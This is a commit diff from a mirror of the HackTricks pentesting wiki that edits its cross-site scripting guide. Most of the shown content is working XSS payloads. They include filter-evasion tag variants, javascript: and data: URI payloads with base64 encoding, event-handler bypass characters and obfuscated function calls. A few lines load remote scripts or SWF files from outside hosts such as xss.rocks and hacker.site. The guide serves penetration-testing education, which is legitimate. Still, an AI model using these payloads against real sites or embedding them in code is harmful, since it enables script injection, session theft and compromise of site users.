0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [master] one page modified

This commit is contained in:
CPol 2021-06-02 22:22:26 +00:00 committed by gitbook-bot
parent 6cd6d2715f
commit d0a6c56d6b
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 123 additions and 80 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

203
pentesting-web/xss-cross-site-scripting/README.md
View File

@ -9,10 +9,9 @@
1. In **raw HTML**:
1. Can you create new HTML tags?
2. Can you use events or attributes supporting `javascript:` protocol?
3. Can you create your own HTML tags?
4. Can you bypass protections?
5. Is the HTML content being interpreted by any client side JS engine \(_AngularJS_, _VueJS_, _Mavo_...\), you could abuse a [**Client Side Template Injection**](../client-side-template-injection-csti.md).
6. If you cannot create HTML tags that execute JS code,could you abuse a [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection.md).
3. Can you bypass protections?
4. Is the HTML content being interpreted by any client side JS engine \(_AngularJS_, _VueJS_, _Mavo_...\), you could abuse a [**Client Side Template Injection**](../client-side-template-injection-csti.md).
5. If you cannot create HTML tags that execute JS code, could you abuse a [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection.md)?
2. Inside a **HTML tag**:
1. Can you exit to raw HTML context?
2. Can you create new events/attributes to execute JS code?
@ -119,10 +118,12 @@ If some kind of blacklist is being used you could try to bypass it with some sil
//Random capitalization
<script> --> <ScrIpT>
<img --> <ImG
//Double tag, in case just the first match is removed
<script><script>
//Double tag inside, in case just checked once
<scr<script>ipt>
<SCRscriptIPT>alert(1)</SCRscriptIPT>
//You can substitude the space to separate attributes for:
/
/*%00/
@ -132,28 +133,37 @@ If some kind of blacklist is being used you could try to bypass it with some sil
%0C
%0A
%09
//Unexpected parent tags
<svg><x><script>alert('1'&#41</x>
//Unexpected weird attributes
<script x>
<script a="1234">
<script ~~~>
<script/random>alert(1)</script>
<script ///Note the newline
>alert(1)</script>
<scr\x00ipt>alert(1)</scr\x00ipt>
//Not closing tag, ending with " <" or " //"
<iframe SRC="javascript:alert('XSS');" <
<iframe SRC="javascript:alert('XSS');" //
//Extra open
<<script>alert("XSS");//<</script>
//Just weird an unexpected, use your imagination
<</script/script><script>
<input type=image src onerror="prompt(1)">
//Using `` instead of parenthesis
onerro=alert`1`
onerror=alert`1`
//Use more than one
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
```
![](../../.gitbook/assets/image%20%28481%29.png)
### Length bypass \(XSS in 20chars\)
Taken from the blog of [Jorge Lajara](https://jlajara.gitlab.io/posts/2019/11/30/XSS_20_characters.html).
@ -169,21 +179,6 @@ More of these characters can be found [here](https://www.unicode.org/charts/norm
To check in which characters are decomposed check [here](https://www.compart.com/en/unicode/U+2121).
**More tiny XSS** payload [can be found here](https://github.com/terjanq/Tiny-XSS-Payloads).
### Weird combinations
From [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
```markup
<svg><animate onbegin=alert() attributeName=x></svg>
<object data="data:text/html,<script>alert(5)</script>">
<iframe srcdoc="<svg onload=alert(4);>">
<object data=javascript:alert(3)>
<iframe src=javascript:alert(2)>
<embed src=javascript:alert(1)>
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
```
### Click XSS - Clickjacking
If in order to exploit the vulnerability you need the **user to click a link or a form** with prepopulated data you could try to [**abuse Clickjacking**](../clickjacking.md#xss-clickjacking) \(if the page is vulnerable\).
@ -255,12 +250,63 @@ Note that **any kind of HTML encode is valid**:
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
```
#### Bypass inside `javascript:`using HTML and URL encoding
### Special Protocols Within the attribute
Your input could also by **reflected** in HTML tags that accept the protocol **`javascript:`** like `<a href="javascript:fetch('/<your_input>'">` in these cases you can still **alter** the **JS flow** to execute arbitrary code.
_**In this case the HTML encoding and the Unicode encoding trick from the previous section is also valid as you are inside an attribute.**_
Moreover, there is another **nice trick** for these cases**: Even if your input inside `javascript:...` is being URL encoded, it will be URL decoded before it's executed.** So, if you need to **escape** from the **string** using a **single quote** and you see that **it's being URL encoded**, remember that **it doesn't matter,** it will be **interpreted** as a **single quote** during the **execution** time.
_Note the `javascript:` protocol can be **used in any tag that accepts the attribute `href`** and in **most** of the tags that accepts the **attribute `src`** \(but not `<img`\)_
There you can use the protocols **`javascript:`** or **`data:`** in some places to **execute arbitrary JS code**. Some will require user interaction on some won't.
```javascript
javascript:alert(1)
JavaSCript:alert(1)
javascript:%61%6c%65%72%74%28%31%29 //URL encode
javascript&colon;alert(1)
javascript&#x003A;alert(1)
javascript&#58;alert(1)
&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3aalert(1)
java //Note the new line
script:alert(1)
data:text/html,<script>alert(1)</script>
DaTa:text/html,<script>alert(1)</script>
data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
data:text/html;charset=UTF-8,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==
```
#### Places where you can inject these protocols
**In general** the `javascript:` protocol can be **used in any tag that accepts the attribute `href`** and in **most** of the tags that accepts the **attribute `src`** \(but not `<img`\)
```javascript
<a href="javascript:alert(1)">
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<form action="javascript:alert(1)"><button>send</button></form>
<form id=x></form><button form="x" formaction="javascript:alert(1)">send</button>
<object data=javascript:alert(3)>
<iframe src=javascript:alert(2)>
<embed src=javascript:alert(1)>
<object data="data:text/html,<script>alert(5)</script>">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
<iframe src="data:text/html,<script>alert(5)</script>"></iframe>
//Special cases
<object data="//hacker.site/xss.swf"> .//https://github.com/evilcos/xss.swf
<embed code="//hacker.site/xss.swf" allowscriptaccess=always> //https://github.com/evilcos/xss.swf
<iframe srcdoc="<svg onload=alert(4);>">
```
#### Other obfuscation tricks
_**In this case the HTML encoding and the Unicode encoding trick from the previous section is also valid as you are inside an attribute.**_
```javascript
<a href="javascript:var a='&apos;-alert(1)-&apos;'">
```
Moreover, there is another **nice trick** for these cases**: Even if your input inside `javascript:...` is being URL encoded, it will be URL decoded before it's executed.** So, if you need to **escape** from the **string** using a **single quote** and you see that **it's being URL encoded**, remember that **it doesn't matter,** it will be **interpreted** as a **single quote** during the **execution** time.
```javascript
&apos;-alert(1)-&apos;
@ -286,22 +332,36 @@ You can use **Hex** and **Octal encode** inside the `src` attribute of `iframe`
<svg onload=javascript:'\141\154\145\162\164\50\61\51' />
```
#### Using data encoding
### Reverse tab nabbing
```javascript
<object data="data:text/html,<script>alert(1)</script>"></object>
<object data="data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e"></object>
<object data="data:text/html;charset=UTF-8,<script>alert(1)</script>"></object>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="></object>
<object data="data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg"></object>
<a target="_blank" rel="opener"
```
#### &lt;a target="\_blank" rel="opener"
If you can inject any URL in an arbitrary **`<a href=`** tag that contains the **`target="_blank" and rel="opener"`** attributes, check the **following page to exploit this behavior**:
{% page-ref page="../reverse-tab-nabbing.md" %}
### on Event Handlers Bypass
First of all check this page \([https://portswigger.net/web-security/cross-site-scripting/cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)\) for useful **"on" event handlers**.
In case there is some blacklist preventing you from creating this even handlers you can try the following bypasses:
```javascript
<svg onload%09=alert(1)> //No safari
<svg %09onload=alert(1)>
<svg %09onload%20=alert(1)>
<svg onload%09%20%28%2c%3b=alert(1)>
//chars allowed between the onevent and the "="
IExplorer: %09 %0B %0C %020 %3B
Chrome: %09 %20 %28 %2C %3B
Safari: %2C %3B
Firefox: %09 %20 %28 %2C %3B
Opera: %09 %20 %2C %3B
Android: %09 %20 %28 %2C %3B
```
### XSS in "Unexploitable tags" \(input hidden, link, canonical\)
From [here](https://portswigger.net/research/xss-in-hidden-input-fields):
@ -351,13 +411,17 @@ If `<>` are being sanitised you can still **escape the string** where your input
### Template literals \`\`
In order to construct **strings** apart from single and double quotes JS also accepts **backticks** ``````````````` . This is known as template literals as they allow to **embedded JS expressions** using````````${ ... }`syntax.
Therefore, if you find that your **input** is being **reflected inside** a JS string that is using **backticks**, you can abuse the syntax`${ ... }\` to execute **arbitrary JS code**:
```var greetings =``Hello, \`\`\`
In order to construct **strings** apart from single and double quotes JS also accepts **backticks** **````````** . This is known as template literals as they allow to **embedded JS expressions** using `${ ... }` syntax.
Therefore, if you find that your input is being **reflected** inside a JS string that is using backticks, you can abuse the syntax `${ ... }` to execute **arbitrary JS code**:
This can be **abused** using: `${alert(1)}`
### Encoded code execution
```javascript
<script>\u0061lert(1)</script>
```
### JavaScript bypass blacklists techniques
#### Strings
@ -373,6 +437,7 @@ String.fromCharCode(116,104,105,115,105,115,97,115,116,114,105,110,103)
"\164\150\151\163\151\163\141\163\164\162\151\156\147"
"\u0074\u0068\u0069\u0073\u0069\u0073\u0061\u0073\u0074\u0072\u0069\u006e\u0067"
"\u{74}\u{68}\u{69}\u{73}\u{69}\u{73}\u{61}\u{73}\u{74}\u{72}\u{69}\u{6e}\u{67}"
"\a\l\ert\(1\)"
atob("dGhpc2lzYXN0cmluZw==")
```
@ -383,7 +448,14 @@ atob("dGhpc2lzYXN0cmluZw==")
/**/
```
#### [JavaScript without parentheses](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)
#### JavaScript without parentheses
```javascript
alert`1`
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
```
* [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)
#### JavaScript comments \(from [JavaScript Comments](./#javascript-comments) trick\)
@ -407,11 +479,18 @@ String.fromCharCode(8233) //0xe2 0x80 0xa8
#### Arbitrary function \(alert\) call
```javascript
//Eval like functions
eval('ale'+'rt(1)')
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Function('ale'+'rt(10)')``;
[].constructor.constructor("alert(document.domain)")``
//General function executions
`` //Can be use as parenthesis
alert`document.cookie`
alert(document['cookie'])
with(document)alert(cookie)
eval('ale'+'rt(1)')
(alert)(1)
(alert(1))in"."
a=alert,a(1)
@ -433,8 +512,6 @@ top[/al/.source+/ert/.source](1)
top[8680439..toString(30)](1)
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
@ -456,44 +533,9 @@ al\u0065rt`1`
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
<svg><animate onbegin=alert() attributeName=x></svg>
```
### General tricks
**To constructing strings**
Regex literals:
`/part1/.source+/part2/.source` =&gt; `'part1part2'`
Numbers to strings:
`8680439..toString(30)` =&gt; `'alert'` \( Number is generated using parseInt\(“alert”,30\), other bases also work \)
**use character escape sequences inside of strings**
simple tool for this is available [here](https://mothereff.in/js-escapes):
`"\x41" -> "A"`: hex encoding
`"\u0065" -> "A"`: unicode encoding \(value is decimal\)
`"\101" -> "A"`: octal encoding
**VaRy ThE capItaliZatiOn**
Sometimes a regex or other custom-made filters do case sensitive matching. You can then just use a toLowerCase\(\), like:
`globalThis["aLeRt".toLowerCase()]`
**Calling functions**
``alert`1``` : Template literal syntax
`alert.apply(this,[1])`: Using Function.prototype.apply
`alert.call(this,1)`: Using Function.prototype.call
`alert(1)`: Obviously, but included for completeness.
`[1].find(alert)`: Using predicates
`[1].filter(alert)`: Using predicates
**Reuse and recycle**
Remember to look into what is already loaded! jQuery is an easy example, but any sufficiently complex framework will likely have something usable. [Wappalyzer](https://chrome.google.com/webstore/detail/wappalyzer/gppongmhjkpfnbhagpmjfkannfbllamg?hl=en) or equivalent can help here.
`window.jQuery.globalEval("alert(1)")`
`$.globalEval("alert(1)")`
## **DOM vulnerabilities**
There is **JS code** that is using **unsafely data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.
@ -561,6 +603,7 @@ A XSS occurs.
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
<svg><x><script>alert('1'&#41</x>
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
<svg><animate onbegin=alert() attributeName=x></svg>
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);"
```